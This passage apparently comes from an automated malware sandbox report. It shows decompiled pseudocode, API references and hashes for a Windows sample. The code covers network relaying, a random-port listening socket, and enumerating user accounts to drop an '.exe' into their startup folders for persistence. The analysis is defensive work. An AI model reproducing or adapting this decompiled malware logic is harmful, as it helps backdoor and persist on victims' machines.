																							__eflags = _t489 - 0x10;
																							if(_t489 < 0x10) {
																								continue;
																							} else {
																								goto L84;
																							}
																							goto L126;
																						}
																						__eflags = (_t350 & 0x000000ff) - (_t418 & 0x000000ff);
																						goto L83;
																					}
																				} else {
																					__eflags = _v480 - _v1272;
																					L83:
																					if(__eflags != 0) {
																						goto L116;
																					} else {
																						L84:
																						__eflags =  *((char*)(_t377 + 2));
																						if( *((char*)(_t377 + 2)) != 0) {
																							goto L116;
																						} else {
																							_t327 = 0;
																							__eflags =  *_t377;
																							if( *_t377 != 0) {
																								goto L116;
																							} else {
																								__eflags = _v1348;
																								if(_v1348 == 0) {
																									_t327 = E00410820( &_v612,  &_v1276, _v1340);
																									__eflags = _v624 - 0x17;
																									if(_v624 == 0x17) {
																										_v588 = 0;
																										_v608 = 0;
																									}
																									_v1348 = _v1340;
																								}
																								E00410870(_t327,  &_v1276, _t327, 0x80);
																								_t330 = ( *(_t377 + 3) & 0x000000ff) - 1;
																								__eflags = _t330;
																								if(_t330 == 0) {
																									__eflags = _t501 - 0xa;
																									if(_t501 <= 0xa) {
																										goto L116;
																									} else {
																										_t168 = _t377 + 4; // 0x4
																										_v1340 = 0x10;
																										_v1276 = 2;
																										E00410820( &_v1272, _t168, 4);
																										_t487 = 8;
																										goto L110;
																									}
																								} else {
																									_t338 = _t330 - 2;
																									__eflags = _t338;
																									if(_t338 == 0) {
																										_t339 =  *((intOrPtr*)(_t377 + 4));
																										__eflags = _t339;
																										if(_t339 != 0) {
																											_t340 = _t339 & 0x000000ff;
																											__eflags = _t501 - _t340 + 7;
																											if(_t501 > _t340 + 7) {
																												_t145 = _t377 + 5; // 0x5
																												_t341 = E00410820( &_v868, _t145, _t340);
																												 *((char*)(_t504 + _t341 + 0x200)) = 0;
																												_t150 = _t341 + 5; // 0x5
																												_t487 = _t150;
																												_t342 =  &_v880;
																												_v1324 = 0;
																												__imp__getaddrinfo(_t342, 0, 0,  &_v1324);
																												__eflags = _t342;
																												if(_t342 == 0) {
																													_t503 = _v1328;
																													_t456 = 0;
																													__eflags = 0;
																													do {
																														_t343 = _t503;
																														__eflags = _t503;
																														if(_t503 == 0) {
																															goto L103;
																														} else {
																															_t412 =  *((intOrPtr*)(_t504 + 0x48 + (_t456 & 0x000000ff) * 4));
																															while(1) {
																																__eflags =  *((intOrPtr*)(_t343 + 4)) - _t412;
																																if( *((intOrPtr*)(_t343 + 4)) == _t412) {
																																	break;
																																}
																																_t343 =  *(_t343 + 0x1c);
																																__eflags = _t343;
																																if(_t343 != 0) {
																																	continue;
																																} else {
																																	goto L103;
																																}
																																goto L126;
																															}
																															_v1356 =  *((intOrPtr*)(_t343 + 0x10));
																															E00410820( &_v1292,  *((intOrPtr*)(_t343 + 0x18)),  *((intOrPtr*)(_t343 + 0x10)));
																															__eflags = _v1304 - 0x17;
																															if(_v1304 == 0x17) {
																																__eflags = 0;
																																_v1268 = 0;
																																_v1288 = 0;
																															}
																															__imp__freeaddrinfo(_v1328);
																															_t501 = _v1308;
																															goto L110;
																														}
																														goto L126;
																														L103:
																														_t456 = _t456 + 1;
																														__eflags = _t456 - 2;
																													} while (_t456 < 2);
																												}
																											}
																										}
																										goto L116;
																									} else {
																										__eflags = _t338 != 1;
																										if(_t338 != 1) {
																											goto L116;
																										} else {
																											__eflags = _t501 - 0x16;
																											if(_t501 <= 0x16) {
																												goto L116;
																											} else {
																												_t138 = _t377 + 4; // 0x4
																												_v1340 = 0x1c;
																												_v1276 = 0x17;
																												_t142 = E00410820( &_v1268, _t138, 0x10) - 3; // -3
																												_t487 = _t142;
																												L110:
																												_t488 = _t487 + 2;
																												__eflags = _v1336 - 0xffffffff;
																												_v1274 =  *((intOrPtr*)(_t377 + _t487));
																												if(_v1336 != 0xffffffff) {
																													L113:
																													__eflags = _t501 - _t488;
																													if(_t501 > _t488) {
																														__eflags = _v1320 - (_v1276 & 0x0000ffff);
																														if(_v1320 == (_v1276 & 0x0000ffff)) {
																															_t502 = _t501 - _t488;
																															__eflags = _t502;
																															__imp__#20(_v1336, _t377 + _t488, _t502, 0,  &_v1276, _v1340);
																														}
																													}
																													goto L116;
																												} else {
																													E00410870( &_v868,  &_v868, 0, 0x80);
																													_t337 = _v1288;
																													_v880 = _t337;
																													_v1332 = _t337 & 0x0000ffff;
																													_t315 = E00415320( &_v880);
																													_v1348 = _t315;
																													__eflags = _t315 - 0xffffffff;
																													if(_t315 != 0xffffffff) {
																														asm("sbb edi, edi");
																														_t470 = ( ~(_v1320 - 0x17) & 0xfffffff4) + 0x16;
																														__eflags = _t470;
																														goto L113;
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
																goto L126;
															}
														}
														L126:
														E004152D0(_t315, _v1312);
														_t290 = E004107C0(_t377);
														_t480 = _v1304;
													}
												} else {
													_v1304 = 1;
													_t480 = _t498;
												}
												L152:
												E004152D0(_t290, _t480);
											} else {
												goto L62;
											}
										}
									}
								} else {
									_v1280 = 7;
								}
							}
						}
					}
					E004107C0(_v1252);
					_t279 = _v1281;
					__eflags = _t279 - 1;
					if(_t279 != 1) {
						L51:
						return _t279;
					} else {
						__eflags = _v1280;
						if(_v1280 == 0) {
							goto L51;
						} else {
							_push(_v1260);
							_t282 = E00408CE0(_v1280 | 0xffffffff, _v24, _v1280);
							__eflags = _t282;
							_t249 = _t282 != 0;
							__eflags = _t249;
							return _t282 & 0xffffff00 | _t249;
						}
					}
				} else {
					return 1;
				}
			}

0x00408e37
0x00408e41
0x00408e4f
0x00408e57
0x00408e5f
0x00408e6b
0x00408e6b
0x00408e61
0x00408e61
0x00408e61
0x00408e81
0x00408e8f
0x00409149
0x00409149
0x00000000
0x00409149
0x00408e95
0x00408e9b
0x00000000
0x00000000
0x00408eb9
0x00408ec0
0x00408ed1
0x00408ed1
0x00000000
0x00408ec2
0x00408ec2
0x00408ecb
0x00408f1c
0x00408f23
0x00408f23
0x00408ecf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00408ecf
0x00408ec2
0x00408ed3
0x00408ed5
0x00408ee8
0x00408eee
0x00408ef2
0x00408efb
0x00000000
0x00000000
0x00408f0b
0x00408f2f
0x00408f34
0x00408f39
0x00408f3b
0x00000000
0x00000000
0x00408f41
0x00408f46
0x00000000
0x00408f4c
0x00408f4c
0x00408f51
0x00408f61
0x00408f69
0x00408f53
0x00408f53
0x00408f57
0x00408f57
0x00408f51
0x00408f78
0x00408f7a
0x00408f7a
0x00408f7b
0x00408f7f
0x004090e9
0x004090ee
0x004090f0
0x00000000
0x00000000
0x004090ff
0x00409101
0x00409105
0x00409107
0x00409110
0x00409115
0x00409117
0x0040911b
0x0040911b
0x00000000
0x00409109
0x00409109
0x00409109
0x00408f85
0x00408f85
0x00408f85
0x00408f88
0x00408fe9
0x00408ffa
0x00408fff
0x00409001
0x00000000
0x00000000
0x00409007
0x0040900b
0x0040900d
0x00000000
0x00000000
0x0040901e
0x00409023
0x00409025
0x00000000
0x00000000
0x00409032
0x00409041
0x00409048
0x0040904c
0x00409052
0x00409054
0x00409060
0x00409064
0x00409064
0x00409066
0x00409066
0x00409068
0x0040906a
0x00000000
0x0040906c
0x0040906f
0x00409073
0x00409073
0x00409076
0x00000000
0x00000000
0x00409078
0x0040907b
0x0040907d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040907d
0x004090a3
0x004090a5
0x004090a9
0x004090ab
0x004090bf
0x004090c3
0x00000000
0x004090c5
0x004090c5
0x004090c8
0x004090d0
0x004090d0
0x004090ad
0x004090ad
0x004090b2
0x004090b7
0x004090b7
0x004090ab
0x00000000
0x0040907f
0x0040907f
0x00409081
0x00409081
0x00409087
0x0040908c
0x00409056
0x00409056
0x00409056
0x00408f8a
0x00408f8a
0x00408f8b
0x00000000
0x00000000
0x00408fa2
0x00408fa5
0x00408faa
0x00408fac
0x00000000
0x00000000
0x00408fbf
0x00408fc1
0x00408fc5
0x00408fc7
0x00408fd3
0x00408fd8
0x00408fda
0x00408fe1
0x00408fe1
0x0040911e
0x0040911e
0x0040911f
0x00409120
0x00409123
0x00408fc9
0x00408fc9
0x00408fc9
0x00408fc7
0x00408f88
0x00409128
0x00409139
0x0040913e
0x00409140
0x00409144
0x00000000
0x00409144
0x00409158
0x0040915d
0x00409162
0x0040916d
0x00409171
0x0040917a
0x0040917a
0x0040917b
0x004097c9
0x004097cb
0x004097ce
0x004097d9
0x004097e2
0x004097e9
0x004097ef
0x004097f4
0x004097f7
0x00409801
0x00409804
0x0040980d
0x00409806
0x00409806
0x00409806
0x004097f9
0x004097f9
0x004097fa
0x004097fa
0x00000000
0x004097d0
0x004097d0
0x004097d0
0x00409181
0x00409181
0x00409181
0x00409182
0x004096fa
0x004096fe
0x00409702
0x00409712
0x00409704
0x0040970b
0x0040970b
0x0040971c
0x0040971e
0x00409722
0x00409725
0x0040973c
0x00409747
0x00409749
0x0040974c
0x004097a7
0x004097a7
0x004097ac
0x004097af
0x004097b8
0x004097bb
0x004097bd
0x004097bd
0x004097b1
0x004097b1
0x004097b1
0x0040974e
0x00409762
0x00409764
0x00409769
0x0040976c
0x0040977a
0x00409783
0x0040978d
0x00409798
0x0040979a
0x0040979d
0x0040979f
0x004097a0
0x004097a0
0x004097a5
0x00000000
0x0040976e
0x0040976e
0x0040976e
0x0040976c
0x00409727
0x00409727
0x00409727
0x00409188
0x00409188
0x00409189
0x00409195
0x004091ac
0x004091b0
0x004091b4
0x004091ba
0x004091bc
0x00409201
0x00409201
0x004091be
0x004091be
0x004091cc
0x004091d2
0x004091d4
0x00000000
0x004091d6
0x004091d8
0x004091de
0x004091e3
0x004091e5
0x004091e9
0x004091e9
0x004091f6
0x004091f8
0x004091fc
0x004091ff
0x0040921e
0x00409220
0x00409222
0x00409234
0x0040923a
0x0040923f
0x00409242
0x004096cd
0x004096d0
0x004096e7
0x004096ec
0x004096f1
0x004096d2
0x004096d4
0x004096d9
0x004096de
0x004096de
0x00409248
0x00409248
0x00409254
0x00409259
0x0040925d
0x00409261
0x00409265
0x00409270
0x00409277
0x0040927e
0x00409285
0x0040928b
0x0040928d
0x004092a0
0x004092a7
0x004092ac
0x004092ae
0x00000000
0x00000000
0x004092b9
0x004092bf
0x004092c1
0x00000000
0x00000000
0x00000000
0x004092c7
0x004092d0
0x004092d8
0x004092dd
0x004092df
0x004095a5
0x004095a5
0x004095a9
0x004095ac
0x004095b9
0x004095be
0x004095c0
0x004095cb
0x004095df
0x004095e5
0x004095e9
0x004095eb
0x004095f6
0x004095f8
0x004095fb
0x004095fe
0x0040960e
0x00409611
0x00409614
0x0040961e
0x00409621
0x00409623
0x00409625
0x00000000
0x00409625
0x00409616
0x00409616
0x00409618
0x00409629
0x0040962a
0x0040962e
0x0040963a
0x0040963f
0x00409653
0x00409653
0x0040965c
0x0040965c
0x004095ed
0x004095ed
0x004095f2
0x004095f4
0x00000000
0x00000000
0x004095f4
0x004095eb
0x004095c0
0x00409669
0x0040966f
0x0040967b
0x00409682
0x00409689
0x00409693
0x004096a4
0x004096aa
0x004096ac
0x00409295
0x00409299
0x00000000
0x00409299
0x004092e5
0x004092e9
0x004092fc
0x00409302
0x00409304
0x00409308
0x0040930a
0x00409310
0x00409313
0x00000000
0x00409319
0x00409319
0x0040931e
0x00409326
0x00000000
0x0040932c
0x0040932c
0x00409330
0x0040933f
0x00409343
0x00000000
0x00409345
0x00409345
0x00409350
0x00409350
0x00409357
0x0040935b
0x0040935d
0x00000000
0x00000000
0x0040935f
0x00409360
0x00409363
0x00000000
0x00409365
0x00000000
0x00409365
0x00000000
0x00409363
0x0040936d
0x00000000
0x0040936d
0x00409332
0x00409339
0x0040936f
0x0040936f
0x00000000
0x00409375
0x00409375
0x00409375
0x00409379
0x00000000
0x0040937f
0x0040937f
0x00409381
0x00409384
0x00000000
0x0040938a
0x0040938a
0x0040938e
0x004093a2
0x004093a7
0x004093b0
0x004093b2
0x004093b9
0x004093b9
0x004093c4
0x004093c4
0x004093d3
0x004093dc
0x004093dc
0x004093dd
0x004094e3
0x004094e6
0x00000000
0x004094ec
0x004094ee
0x004094fc
0x00409504
0x00409509
0x0040950e
0x00000000
0x0040950e
0x004093e3
0x004093e3
0x004093e3
0x004093e6
0x00409422
0x00409425
0x00409427
0x0040942d
0x00409433
0x00409435
0x0040943c
0x00409448
0x00409454
0x0040945c
0x0040945c
0x00409461
0x00409469
0x00409471
0x00409477
0x00409479
0x0040947f
0x00409483
0x00409483
0x00409485
0x00409485
0x00409487
0x00409489
0x00000000
0x0040948b
0x0040948e
0x00409492
0x00409492
0x00409495
0x00000000
0x00000000
0x00409497
0x0040949a
0x0040949c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040949c
0x004094ad
0x004094bb
0x004094c0
0x004094c6
0x004094c8
0x004094ca
0x004094ce
0x004094ce
0x004094d7
0x004094dd
0x00000000
0x004094dd
0x00000000
0x0040949e
0x0040949e
0x004094a0
0x004094a0
0x004094a5
0x00409479
0x00409435
0x00000000
0x004093e8
0x004093e8
0x004093e9
0x00000000
0x004093ef
0x004093ef
0x004093f2
0x00000000
0x004093f8
0x004093fa
0x00409408
0x00409410
0x0040941a
0x0040941a
0x00409513
0x00409517
0x0040951a
0x0040951f
0x00409524
0x00409578
0x00409578
0x0040957a
0x00409581
0x00409585
0x00409597
0x00409597
0x0040959f
0x0040959f
0x00409585
0x00000000
0x00409526
0x00409535
0x0040953a
0x00409549
0x00409551
0x00409555
0x0040955a
0x0040955e
0x00409561
0x00409570
0x00409575
0x00409575
0x00000000
0x00409575
0x00409561
0x00409524
0x004093f2
0x004093e9
0x004093e6
0x004093dd
0x00409384
0x00409379
0x0040936f
0x00409330
0x00409326
0x00409313
0x0040930a
0x00000000
0x004092df
0x004092a0
0x004096b2
0x004096b6
0x004096c1
0x004096c6
0x004096c6
0x00409224
0x00409224
0x00409229
0x00409229
0x00409812
0x00409812
0x00000000
0x00000000
0x00000000
0x004091ff
0x004091d4
0x0040918b
0x0040918b
0x0040918b
0x00409189
0x00409182
0x0040917b
0x0040981b
0x00409820
0x00409824
0x00409826
0x00409155
0x00409155
0x0040982c
0x0040982c
0x00409831
0x00000000
0x00409837
0x00409846
0x0040984c
0x00409853
0x00409856
0x00409856
0x00409860
0x00409860
0x00409831
0x00408f0d
0x00408f19
0x00408f19

APIs

getsockname.WS2_32 ref: 00408E57
send.WS2_32(?,?,00000002,00000000), ref: 00408EF2

Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01

HeapAlloc.KERNEL32(?,00000008,00000020,?,?,?,?,?,?,?,?,?), ref: 00408FBD
getsockname.WS2_32(?,?,?), ref: 004091B4
getpeername.WS2_32(?,?,?), ref: 004091CC
HeapAlloc.KERNEL32(?,00000008,00010003), ref: 00409218
select.WS2_32 ref: 00409285
recv.WS2_32(?,00000000,0000FFFF,00000000), ref: 004092B9
recvfrom.WS2_32(?,00000000,0000FFFF,00000000,?,00000080), ref: 004092FC

Part of subcall function 004152D0: shutdown.WS2_32(00000000,00000002), ref: 004152D8
Part of subcall function 004152D0: closesocket.WS2_32(00000000), ref: 004152DF

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeapgetsocknamerecvselect$closesocketgetpeernamerecvfromsendshutdown
String ID:
API String ID: 1523422563-0
Opcode ID: 705aebef64035694f3be4cd527b2f20f0892be9155331a43747557b0353bfd50
Instruction ID: b8c940c71f80db384a4505ddf1698f160a7933dfec3a6e730242661171ae3604
Opcode Fuzzy Hash: 705aebef64035694f3be4cd527b2f20f0892be9155331a43747557b0353bfd50
Instruction Fuzzy Hash: 2552E3715083429AD720DF25C984BABB7E4AFC4304F04493EF595AB2C2E778DD45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040FEA0, Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 261
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040FEA0(void* __eflags) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t74;
				void* _t78;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t89;
				void* _t90;
				void* _t91;
				signed int _t93;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t99;
				void* _t102;
				int _t107;
				signed int _t109;
				char _t112;
				void* _t113;
				void* _t114;
				WCHAR* _t123;
				intOrPtr* _t129;
				CHAR* _t144;
				WCHAR* _t147;
				struct HINSTANCE__* _t148;
				void* _t149;
				void* _t152;
				void* _t155;
				signed int _t156;
				void* _t157;

				_t147 = _t157 + 0x2c;
				_t112 = 0;
				E00424100(0xe1, _t147);
				_t148 = LoadLibraryW(_t147);
				if(_t148 == 0) {
					L14:
					return 0;
				} else {
					_t144 = _t157 + 0x48;
					E004240C0(0xe2, _t144);
					_t74 = GetProcAddress(_t148, _t144);
					if(_t74 != 0) {
						 *((intOrPtr*)(_t157 + 0x20)) = 0x104;
						_t107 =  *_t74(_t157 + 0x6c, _t157 + 0x18);
						if(_t107 == 1) {
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, _t107, _t157 + 0x270);
							if(_t107 == 0) {
								if( *((intOrPtr*)(_t157 + 0x68)) != _t107) {
									do {
										_t107 = _t107 + 1;
									} while ( *((short*)(_t157 + 0x68 + _t107 * 2)) != 0);
								}
								 *(_t157 + 0x1c) = _t107;
								_t109 = StrCmpNIW(_t157 + 0x70, _t157 + 0x274, _t107);
								if(_t109 == 0) {
									_t129 = _t157 + 0x270 +  *(_t157 + 0x18) * 2;
									if(_t129 != 0 &&  *_t129 != _t109) {
										do {
											_t109 = _t109 + 1;
										} while ( *((short*)(_t129 + _t109 * 2)) != 0);
									}
									 *((short*)(_t157 + E00410820(_t157 + 0x278, _t129, _t109 + _t109) + 0x270)) = 0;
									_t112 = 1;
								}
							}
						}
					}
					FreeLibrary(_t148);
					if(_t112 != 0) {
						 *((char*)(_t157 + 0x17)) = 0;
						 *(_t157 + 0x28) = 0;
						do {
							_t156 = 0;
							 *((intOrPtr*)(_t157 + 0x38)) = 0;
							_t149 = NetUserEnum(0, 0, 2, _t157 + 0x28, 0xffffffff, _t157 + 0x28, _t157 + 0x48, _t157 + 0x28);
							 *(_t157 + 0x24) = _t149;
							__eflags = _t149;
							if(_t149 == 0) {
								L18:
								__eflags =  *(_t157 + 0x18) - _t156;
								if( *(_t157 + 0x18) != _t156) {
									__eflags =  *((intOrPtr*)(_t157 + 0x20)) - _t156;
									if( *((intOrPtr*)(_t157 + 0x20)) > _t156) {
										do {
											_t89 = NetUserGetInfo(0,  *( *(_t157 + 0x18) + _t156 * 4), 0x17, _t157 + 0x1c);
											__eflags = _t89;
											if(_t89 == 0) {
												_t90 =  *(_t157 + 0x1c);
												__eflags = _t90;
												if(_t90 != 0) {
													_t91 = E00410670( *((intOrPtr*)(_t90 + 0x10)), _t157 + 0x68);
													__eflags = _t91;
													if(_t91 != 0) {
														_t123 = _t157 + 0x270;
														while(1) {
															_t93 =  *_t123 & 0x0000ffff;
															__eflags = _t93 - 0x5c;
															if(_t93 == 0x5c) {
																goto L26;
															}
															L25:
															__eflags = _t93 - 0x2f;
															if(_t93 == 0x2f) {
																goto L26;
															}
															_t95 = PathCombineW(_t157 + 0x6c, _t157 + 0x6c, _t123);
															__eflags = _t95;
															if(_t95 != 0) {
																_t96 = E00418550(_t157 + 0x68);
																__eflags = _t96;
																if(_t96 != 0) {
																	_push(6);
																	_t97 = E00416A10(_t157 + 0x488, 0, _t157 + 0x70, L".exe");
																	__eflags = _t97;
																	if(_t97 != 0) {
																		_t99 = E00418040(0,  *0x42e954, _t157 + 0x2c);
																		__eflags = _t99;
																		if(_t99 != 0) {
																			_t155 =  *(_t157 + 0x2c);
																			_t114 = E0040EE70(_t157 + 0x484, _t155,  *((intOrPtr*)(_t157 + 0x30)), 0);
																			__eflags = _t155;
																			if(_t155 != 0) {
																				VirtualFree(_t155, 0, 0x8000);
																			}
																			_t102 =  *(_t157 + 0x34);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				CloseHandle(_t102);
																			}
																			__eflags = _t114;
																			if(__eflags != 0) {
																				 *((char*)(_t157 + 0x1f)) = 1;
																				E0040F100(__eflags,  *((intOrPtr*)( *(_t157 + 0x1c) + 0x10)), _t157 + 0x478);
																			}
																		}
																	}
																}
															}
															goto L37;
															L26:
															_t123 =  &(_t123[1]);
															_t93 =  *_t123 & 0x0000ffff;
															__eflags = _t93 - 0x5c;
															if(_t93 == 0x5c) {
																goto L26;
															}
															goto L25;
														}
													}
													L37:
													NetApiBufferFree( *(_t157 + 0x1c));
													_t149 =  *(_t157 + 0x24);
												}
											}
											_t156 = _t156 + 1;
											__eflags = _t156 -  *((intOrPtr*)(_t157 + 0x20));
										} while (_t156 <  *((intOrPtr*)(_t157 + 0x20)));
									}
									NetApiBufferFree( *(_t157 + 0x18));
								}
								goto L40;
							} else {
								__eflags = _t149 - 0xea;
								if(_t149 == 0xea) {
									goto L18;
								}
							}
							break;
							L40:
							__eflags = _t149 - 0xea;
						} while (_t149 == 0xea);
						_t78 = _t157 + 0x270;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t78);
						__eflags = _t78;
						if(_t78 == 0) {
							_push(6);
							_t80 = E00416A10(_t157 + 0x488, _t78, _t157 + 0x278, L".exe");
							__eflags = _t80;
							if(_t80 != 0) {
								_t82 = E00418040(0,  *0x42e954, _t157 + 0x2c);
								__eflags = _t82;
								if(_t82 != 0) {
									_t152 =  *(_t157 + 0x2c);
									_t113 = E0040EE70(_t157 + 0x484, _t152,  *((intOrPtr*)(_t157 + 0x30)), 0);
									__eflags = _t152;
									if(_t152 != 0) {
										VirtualFree(_t152, 0, 0x8000);
									}
									_t84 =  *(_t157 + 0x34);
									__eflags = _t84;
									if(_t84 != 0) {
										CloseHandle(_t84);
									}
									__eflags = _t113;
									if(_t113 != 0) {
										 *((char*)(_t157 + 0x17)) = 1;
									}
								}
							}
						}
						return  *((intOrPtr*)(_t157 + 0x17));
					} else {
						goto L14;
					}
				}
			}

0x0040feaa
0x0040feb3
0x0040feb5
0x0040fec3
0x0040fec7
0x0040ffa0
0x0040ffac
0x0040fecd
0x0040fecd
0x0040fed6
0x0040fedf
0x0040fee7
0x0040fef7
0x0040feff
0x0040ff04
0x0040ff19
0x0040ff21
0x0040ff28
0x0040ff30
0x0040ff30
0x0040ff31
0x0040ff30
0x0040ff3a
0x0040ff4b
0x0040ff53
0x0040ff59
0x0040ff62
0x0040ff70
0x0040ff70
0x0040ff71
0x0040ff70
0x0040ff8b
0x0040ff93
0x0040ff93
0x0040ff53
0x0040ff21
0x0040ff04
0x0040ff96
0x0040ff9e
0x0040ffad
0x0040ffb2
0x0040ffba
0x0040ffd0
0x0040ffd6
0x0040ffe0
0x0040ffe2
0x0040ffe6
0x0040ffe8
0x0040fff6
0x0040fff6
0x0040fffa
0x00410000
0x00410004
0x0041000a
0x0041001b
0x00410021
0x00410023
0x00410029
0x0041002d
0x0041002f
0x0041003d
0x00410042
0x00410044
0x0041004a
0x00410051
0x00410051
0x00410054
0x00410057
0x00000000
0x00000000
0x00410059
0x00410059
0x0041005c
0x00000000
0x00000000
0x0041006c
0x00410072
0x00410074
0x0041007f
0x00410084
0x00410086
0x0041008c
0x004100a1
0x004100a6
0x004100a8
0x004100b6
0x004100bb
0x004100bd
0x004100c3
0x004100d7
0x004100d9
0x004100db
0x004100e5
0x004100e5
0x004100eb
0x004100ef
0x004100f1
0x004100f4
0x004100f4
0x004100fa
0x004100fc
0x0041010e
0x00410113
0x00410113
0x004100fc
0x004100bd
0x004100a8
0x00410086
0x00000000
0x0041005e
0x0041005e
0x00410051
0x00410054
0x00410057
0x00000000
0x00000000
0x00000000
0x00410057
0x00410051
0x00410118
0x0041011d
0x00410123
0x00410123
0x0041002f
0x00410127
0x00410128
0x00410128
0x0041000a
0x00410137
0x00410137
0x00000000
0x0040ffea
0x0040ffea
0x0040fff0
0x00000000
0x00000000
0x0040fff0
0x00000000
0x0041013d
0x0041013d
0x0041013d
0x00410149
0x0041015c
0x00410162
0x00410164
0x00410166
0x0041017d
0x00410182
0x00410184
0x00410192
0x00410197
0x00410199
0x0041019f
0x004101b3
0x004101b5
0x004101b7
0x004101c1
0x004101c1
0x004101c7
0x004101cb
0x004101cd
0x004101d0
0x004101d0
0x004101d6
0x004101d8
0x004101da
0x004101da
0x004101d8
0x00410199
0x00410184
0x004101ed
0x00000000
0x00000000
0x00000000
0x0040ff9e

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,?,00000000), ref: 0040FEBD
GetProcAddress.KERNEL32(00000000,?), ref: 0040FEDF
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000000,?), ref: 0040FF19
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040FF4B
FreeLibrary.KERNEL32(00000000,?,00000000), ref: 0040FF96
NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,00000000), ref: 0040FFDA
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041001B
PathCombineW.SHLWAPI(?,?,?,?,?,00000017,?), ref: 0041006C
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,.exe,00000006,?,?,00000017,?), ref: 004100E5
CloseHandle.KERNEL32(?,?,?,00000000,00000000,?,.exe,00000006,?,?,00000017,?), ref: 004100F4
NetApiBufferFree.NETAPI32(?,?,?,00000017,?), ref: 0041011D
NetApiBufferFree.NETAPI32(?), ref: 00410137
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041015C
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,.exe,00000006), ref: 004101C1
CloseHandle.KERNEL32(?,?,?,00000000,00000000,?,.exe,00000006), ref: 004101D0

Strings

.exe, xrefs: 0041008E, 00410168

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$Path$BufferCloseFolderHandleLibraryUserVirtual$AddressCombineEnumInfoLoadProc
String ID: .exe
API String ID: 491488961-4119554291
Opcode ID: c1c7b63d7f9e79b11a59a0d499a55382066def59abf0e4f6521b7fc3e00dba7d
Instruction ID: 0d7ad36b224aa8f1dd3ef3ba2258d9b1e6e3578f5663fcd2a948b1834b20ccb8
Opcode Fuzzy Hash: c1c7b63d7f9e79b11a59a0d499a55382066def59abf0e4f6521b7fc3e00dba7d
Instruction Fuzzy Hash: AC91E571608301AFD720DF20DC44BEBB7A8AF85744F04492EF985B7290DB79D989C79A

Uniqueness

Uniqueness Score: -1.00%

Function 00406D40, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 151
networkCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00406D40(signed int __eax, void* _a4) {
				intOrPtr _v28;
				short _v130;
				signed short _v132;
				char _v144;
				intOrPtr _v148;
				char _v156;
				char _v160;
				signed int _v166;
				void* __esi;
				long _t29;
				signed int _t30;
				intOrPtr _t34;
				void* _t36;
				signed int _t37;
				void* _t50;
				intOrPtr* _t53;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				intOrPtr* _t72;
				signed int* _t75;

				_t75 = _a4;
				_t68 = __eax;
				if(__eax == 0 || E00406CC0(__eax, _t75) == 0) {
					E00410870( &_v132,  &_v132, 0, 0x80);
					_t53 = __imp__#23;
					_t72 = __imp__#2;
					_v144 = 2;
					_v148 = 0x9c40;
					do {
						_t29 = GetTickCount();
						if(_t29 !=  *0x42dd08) {
							 *0x42dd08 = _t29;
							E00412320(_t29);
						}
						_t30 = E00412360();
						asm("rol dx, 0x8");
						_v130 = _t30 % 0x7531 + 0x2710;
						_t69 =  *_t53(_v132 & 0x0000ffff, 1, 6);
						if(_t69 == 0xffffffff) {
							goto L9;
						} else {
							_t50 =  *_t72(_t69,  &_v144, ((0 | _v144 != 0x00000002) - 0x00000001 & 0xfffffff4) + 0x1c);
							if(_t50 != 0) {
								L8:
								__imp__#3(_t69);
								goto L9;
							} else {
								__imp__#13(_t69, 0x7fffffff);
								if(_t50 != 0) {
									goto L8;
								}
							}
						}
						L11:
						 *_t75 = _t69;
						if(_t69 == 0xffffffff) {
							L17:
							 *_t75 = 0xffffffff;
							_a4 = 0;
							return 0;
						} else {
							_t36 = CreateEventW(0, 0, 0, 0);
							_a4 = _t36;
							if(_t36 == 0) {
								L15:
								_t70 =  *_t75;
								if(_t70 != 0xffffffff) {
									__imp__#22(_t70, 2);
									__imp__#3(_t70);
								}
								goto L17;
							} else {
								__imp__WSAEventSelect( *_t75, _t36, 8);
								if(_t36 == 0) {
									_t37 =  *_t75;
									_v160 = 0x80;
									__imp__#6(_t37,  &_v156,  &_v160);
									if(_t37 != 0) {
										_t71 =  *_t75;
										if(_t71 != 0xffffffff) {
											__imp__#22(_t71, 2);
											__imp__#3(_t71);
										}
										CloseHandle(_a4);
										return 0;
									} else {
										asm("rol cx, 0x8");
										_t68 = _v166 & 0x0000ffff;
										goto L20;
									}
								} else {
									CloseHandle(_a4);
									goto L15;
